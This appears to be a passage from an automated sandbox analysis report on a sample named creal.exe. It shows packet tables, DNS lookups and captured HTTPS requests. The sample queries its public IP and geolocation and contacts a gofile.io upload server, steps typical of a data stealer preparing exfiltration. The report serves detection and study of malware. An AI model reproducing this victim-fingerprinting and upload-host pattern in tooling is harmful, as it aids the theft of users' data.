                                                                                                                                                                                                              Jan 16, 2025 09:09:17.454828978 CET4434976945.112.123.126192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:17.494899988 CET49769443192.168.2.945.112.123.126
                                                                                                                                                                                                              Jan 16, 2025 09:09:17.702621937 CET4434976945.112.123.126192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:17.702687025 CET4434976945.112.123.126192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:17.703053951 CET49769443192.168.2.945.112.123.126
                                                                                                                                                                                                              Jan 16, 2025 09:09:17.707473040 CET49769443192.168.2.945.112.123.126
                                                                                                                                                                                                              Jan 16, 2025 09:09:17.736752987 CET49775443192.168.2.9159.89.102.253
                                                                                                                                                                                                              Jan 16, 2025 09:09:17.736865044 CET44349775159.89.102.253192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:17.736967087 CET49775443192.168.2.9159.89.102.253
                                                                                                                                                                                                              Jan 16, 2025 09:09:17.744019985 CET49775443192.168.2.9159.89.102.253
                                                                                                                                                                                                              Jan 16, 2025 09:09:17.744070053 CET44349775159.89.102.253192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:18.562903881 CET44349775159.89.102.253192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:18.574830055 CET49775443192.168.2.9159.89.102.253
                                                                                                                                                                                                              Jan 16, 2025 09:09:18.574909925 CET44349775159.89.102.253192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:18.575876951 CET44349775159.89.102.253192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:18.575958014 CET49775443192.168.2.9159.89.102.253
                                                                                                                                                                                                              Jan 16, 2025 09:09:18.577927113 CET49775443192.168.2.9159.89.102.253
                                                                                                                                                                                                              Jan 16, 2025 09:09:18.578006029 CET44349775159.89.102.253192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:18.578037024 CET49775443192.168.2.9159.89.102.253
                                                                                                                                                                                                              Jan 16, 2025 09:09:18.619333029 CET44349775159.89.102.253192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:18.619887114 CET49775443192.168.2.9159.89.102.253
                                                                                                                                                                                                              Jan 16, 2025 09:09:18.619910002 CET44349775159.89.102.253192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:18.666752100 CET49775443192.168.2.9159.89.102.253
                                                                                                                                                                                                              Jan 16, 2025 09:09:18.768322945 CET44349775159.89.102.253192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:18.768404007 CET44349775159.89.102.253192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:18.768516064 CET49775443192.168.2.9159.89.102.253
                                                                                                                                                                                                              Jan 16, 2025 09:09:18.768892050 CET49775443192.168.2.9159.89.102.253
                                                                                                                                                                                                              Jan 16, 2025 09:09:19.400418043 CET49788443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:19.400460005 CET4434978831.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:19.400686026 CET49788443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:19.416650057 CET49788443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:19.416663885 CET4434978831.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:20.078603029 CET4434978831.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:20.078852892 CET49788443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:20.081737995 CET49788443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:20.081743956 CET4434978831.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:20.081969023 CET4434978831.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:20.085289955 CET49788443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:20.085721970 CET49788443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:20.085736990 CET4434978831.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:20.670835018 CET4434978831.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:20.670914888 CET4434978831.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:20.670952082 CET49788443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:20.693011045 CET49788443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:20.693030119 CET4434978831.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:20.931714058 CET49801443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:20.931744099 CET4434980131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:20.931802034 CET49801443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:20.940783978 CET49801443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:20.940794945 CET4434980131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:21.573592901 CET4434980131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:21.573668957 CET49801443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:21.575495005 CET49801443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:21.575510025 CET4434980131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:21.575754881 CET4434980131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:21.578738928 CET49801443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:21.579097033 CET49801443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:21.579111099 CET4434980131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:21.900036097 CET4434980131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:21.900099993 CET4434980131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:21.900227070 CET49801443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:21.909840107 CET49801443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:21.909851074 CET4434980131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:22.152545929 CET49813443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:22.152569056 CET4434981331.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:22.153104067 CET49813443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:22.167608976 CET49813443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:22.167622089 CET4434981331.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:22.812155008 CET4434981331.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:22.812227011 CET49813443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:22.813858032 CET49813443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:22.813880920 CET4434981331.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:22.814121962 CET4434981331.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:22.816636086 CET49813443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:22.816726923 CET49813443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:22.816749096 CET4434981331.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:23.417947054 CET4434981331.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:23.418010950 CET4434981331.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:23.418251991 CET49813443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:23.426465988 CET49813443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:23.426472902 CET4434981331.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.154514074 CET49883443192.168.2.9104.26.13.205
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.154580116 CET44349883104.26.13.205192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.154666901 CET49883443192.168.2.9104.26.13.205
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.155741930 CET49883443192.168.2.9104.26.13.205
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.155769110 CET44349883104.26.13.205192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.639352083 CET44349883104.26.13.205192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.640125036 CET49883443192.168.2.9104.26.13.205
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.640189886 CET44349883104.26.13.205192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.643965006 CET44349883104.26.13.205192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.644045115 CET49883443192.168.2.9104.26.13.205
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.646075964 CET49883443192.168.2.9104.26.13.205
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.646334887 CET44349883104.26.13.205192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.646361113 CET49883443192.168.2.9104.26.13.205
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.691346884 CET44349883104.26.13.205192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.692069054 CET49883443192.168.2.9104.26.13.205
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.692095995 CET44349883104.26.13.205192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.738936901 CET49883443192.168.2.9104.26.13.205
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.935204983 CET44349883104.26.13.205192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.935400963 CET44349883104.26.13.205192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.935853004 CET49883443192.168.2.9104.26.13.205
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.936039925 CET49883443192.168.2.9104.26.13.205
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.937314034 CET49889443192.168.2.945.112.123.126
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.937340021 CET4434988945.112.123.126192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.937493086 CET49889443192.168.2.945.112.123.126
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.937911034 CET49889443192.168.2.945.112.123.126
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.937923908 CET4434988945.112.123.126192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.569020033 CET4434988945.112.123.126192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.569500923 CET49889443192.168.2.945.112.123.126
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.569518089 CET4434988945.112.123.126192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.571129084 CET4434988945.112.123.126192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.571185112 CET49889443192.168.2.945.112.123.126
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.572510958 CET49889443192.168.2.945.112.123.126
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.572603941 CET4434988945.112.123.126192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.572792053 CET49889443192.168.2.945.112.123.126
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.572798014 CET4434988945.112.123.126192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.613935947 CET49889443192.168.2.945.112.123.126
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.820374012 CET4434988945.112.123.126192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.820549965 CET4434988945.112.123.126192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.820638895 CET49889443192.168.2.945.112.123.126
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.826900005 CET49889443192.168.2.945.112.123.126
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.827884912 CET49895443192.168.2.9159.89.102.253
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.827924013 CET44349895159.89.102.253192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.828660965 CET49895443192.168.2.9159.89.102.253
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.828977108 CET49895443192.168.2.9159.89.102.253
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.828991890 CET44349895159.89.102.253192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:36.658536911 CET44349895159.89.102.253192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:36.658982038 CET49895443192.168.2.9159.89.102.253
                                                                                                                                                                                                              Jan 16, 2025 09:09:36.658993959 CET44349895159.89.102.253192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:36.659920931 CET44349895159.89.102.253192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:36.659976959 CET49895443192.168.2.9159.89.102.253
                                                                                                                                                                                                              Jan 16, 2025 09:09:36.661403894 CET49895443192.168.2.9159.89.102.253
                                                                                                                                                                                                              Jan 16, 2025 09:09:36.661468029 CET44349895159.89.102.253192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:36.661621094 CET49895443192.168.2.9159.89.102.253
                                                                                                                                                                                                              Jan 16, 2025 09:09:36.661629915 CET44349895159.89.102.253192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:36.707799911 CET49895443192.168.2.9159.89.102.253
                                                                                                                                                                                                              Jan 16, 2025 09:09:36.851468086 CET44349895159.89.102.253192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:36.851650000 CET44349895159.89.102.253192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:36.851833105 CET49895443192.168.2.9159.89.102.253
                                                                                                                                                                                                              Jan 16, 2025 09:09:36.858282089 CET49895443192.168.2.9159.89.102.253
                                                                                                                                                                                                              Jan 16, 2025 09:09:37.497226000 CET49911443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:37.497272015 CET4434991131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:37.497327089 CET49911443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:37.513622999 CET49911443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:37.513643980 CET4434991131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:38.139780045 CET4434991131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:38.139961958 CET49911443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:38.141330957 CET49911443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:38.141360044 CET4434991131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:38.141576052 CET4434991131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:38.143964052 CET49911443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:38.143995047 CET49911443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:38.144042969 CET4434991131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:38.739506006 CET4434991131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:38.739602089 CET4434991131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:38.739664078 CET49911443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:38.750478983 CET49911443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:38.750504971 CET4434991131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:39.026777029 CET49921443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:39.026823044 CET4434992131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:39.027209997 CET49921443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:39.042964935 CET49921443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:39.042979956 CET4434992131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:39.697187901 CET4434992131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:39.697282076 CET49921443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:39.698843956 CET49921443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:39.698858976 CET4434992131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:39.699188948 CET4434992131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:39.702038050 CET49921443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:39.702320099 CET49921443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:39.702330112 CET4434992131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:40.296029091 CET4434992131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:40.296195984 CET4434992131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:40.296417952 CET49921443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:40.333288908 CET49921443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:40.333304882 CET4434992131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:40.759536982 CET49934443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:40.759591103 CET4434993431.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:40.759665012 CET49934443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:40.771699905 CET49934443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:40.771739006 CET4434993431.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:42.264317036 CET4434993431.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:42.264406919 CET49934443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:42.266211033 CET49934443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:42.266235113 CET4434993431.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:42.267079115 CET4434993431.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:42.269721985 CET49934443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:42.269800901 CET49934443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:42.269851923 CET4434993431.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:43.061209917 CET4434993431.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:43.061392069 CET4434993431.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:43.061450005 CET49934443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:43.076380014 CET49934443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:43.076407909 CET4434993431.14.70.245192.168.2.9

                                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                              Jan 16, 2025 09:09:16.186455011 CET5948053192.168.2.91.1.1.1
                                                                                                                                                                                                              Jan 16, 2025 09:09:16.193253040 CET53594801.1.1.1192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:16.814632893 CET5885053192.168.2.91.1.1.1
                                                                                                                                                                                                              Jan 16, 2025 09:09:16.821820021 CET53588501.1.1.1192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:17.721865892 CET6522953192.168.2.91.1.1.1
                                                                                                                                                                                                              Jan 16, 2025 09:09:17.730237961 CET53652291.1.1.1192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:19.389302969 CET5167253192.168.2.91.1.1.1
                                                                                                                                                                                                              Jan 16, 2025 09:09:19.397696972 CET53516721.1.1.1192.168.2.9

                                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                              Jan 16, 2025 09:09:16.186455011 CET192.168.2.91.1.1.10x95c8Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Jan 16, 2025 09:09:16.814632893 CET192.168.2.91.1.1.10x1555Standard query (0)api.gofile.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Jan 16, 2025 09:09:17.721865892 CET192.168.2.91.1.1.10x55acStandard query (0)geolocation-db.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Jan 16, 2025 09:09:19.389302969 CET192.168.2.91.1.1.10x859aStandard query (0)store4.gofile.ioA (IP address)IN (0x0001)false

                                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                              Jan 16, 2025 09:09:06.202106953 CET1.1.1.1192.168.2.90x978aNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                              Jan 16, 2025 09:09:06.202106953 CET1.1.1.1192.168.2.90x978aNo error (0)azurefd-t-fb-prod.trafficmanager.netdual.s-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                              Jan 16, 2025 09:09:06.202106953 CET1.1.1.1192.168.2.90x978aNo error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                              Jan 16, 2025 09:09:06.202106953 CET1.1.1.1192.168.2.90x978aNo error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Jan 16, 2025 09:09:16.193253040 CET1.1.1.1192.168.2.90x95c8No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Jan 16, 2025 09:09:16.193253040 CET1.1.1.1192.168.2.90x95c8No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Jan 16, 2025 09:09:16.193253040 CET1.1.1.1192.168.2.90x95c8No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Jan 16, 2025 09:09:16.821820021 CET1.1.1.1192.168.2.90x1555No error (0)api.gofile.io45.112.123.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Jan 16, 2025 09:09:16.821820021 CET1.1.1.1192.168.2.90x1555No error (0)api.gofile.io51.91.7.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Jan 16, 2025 09:09:17.730237961 CET1.1.1.1192.168.2.90x55acNo error (0)geolocation-db.com159.89.102.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Jan 16, 2025 09:09:19.397696972 CET1.1.1.1192.168.2.90x859aNo error (0)store4.gofile.io31.14.70.245A (IP address)IN (0x0001)false

                                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                                              • api.ipify.org
                                                                                                                                                                                                              • api.gofile.io
                                                                                                                                                                                                              • geolocation-db.com
                                                                                                                                                                                                              • store4.gofile.io

                                                                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              0192.168.2.949763104.26.13.2054437612C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2025-01-16 08:09:16 UTC117OUTGET / HTTP/1.1
                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                              Host: api.ipify.org
                                                                                                                                                                                                              User-Agent: Python-urllib/3.12
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              2025-01-16 08:09:16 UTC423INHTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Thu, 16 Jan 2025 08:09:16 GMT
                                                                                                                                                                                                              Content-Type: text/plain
                                                                                                                                                                                                              Content-Length: 12
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 902c9f57bde282ed-IAD
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=7112&min_rtt=7104&rtt_var=2680&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=709&delivery_rate=407195&cwnd=32&unsent_bytes=0&cid=5d1c52e20736cd7f&ts=155&x=0"
                                                                                                                                                                                                              2025-01-16 08:09:16 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                                                                              Data Ascii: 8.46.123.189


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              1192.168.2.94976945.112.123.1264437612C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2025-01-16 08:09:17 UTC126OUTGET /getServer HTTP/1.1
                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                              Host: api.gofile.io
                                                                                                                                                                                                              User-Agent: Python-urllib/3.12
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              2025-01-16 08:09:17 UTC1146INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx/1.27.1
                                                                                                                                                                                                              Date: Thu, 16 Jan 2025 08:09:17 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                              Content-Length: 14
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                              Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
                                                                                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                                                                                              Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                                                                                                                                                                                              Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                              Origin-Agent-Cluster: ?1
                                                                                                                                                                                                              Referrer-Policy: no-referrer
                                                                                                                                                                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                              X-DNS-Prefetch-Control: off
                                                                                                                                                                                                              X-Download-Options: noopen
                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                              ETag: W/"e-18wLxDNka2j9cTg7gpgujtuBb1A"
                                                                                                                                                                                                              X-Robots-Tag: noindex, nofollow
                                                                                                                                                                                                              2025-01-16 08:09:17 UTC14INData Raw: 65 72 72 6f 72 2d 6e 6f 74 46 6f 75 6e 64
                                                                                                                                                                                                              Data Ascii: error-notFound


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              2192.168.2.949775159.89.102.2534437612C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2025-01-16 08:09:18 UTC140OUTGET /jsonp/8.46.123.189 HTTP/1.1
                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                              Host: geolocation-db.com
                                                                                                                                                                                                              User-Agent: Python-urllib/3.12
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              2025-01-16 08:09:18 UTC206INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                              Date: Thu, 16 Jan 2025 08:09:18 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Access-Control-Allow-Origin: *
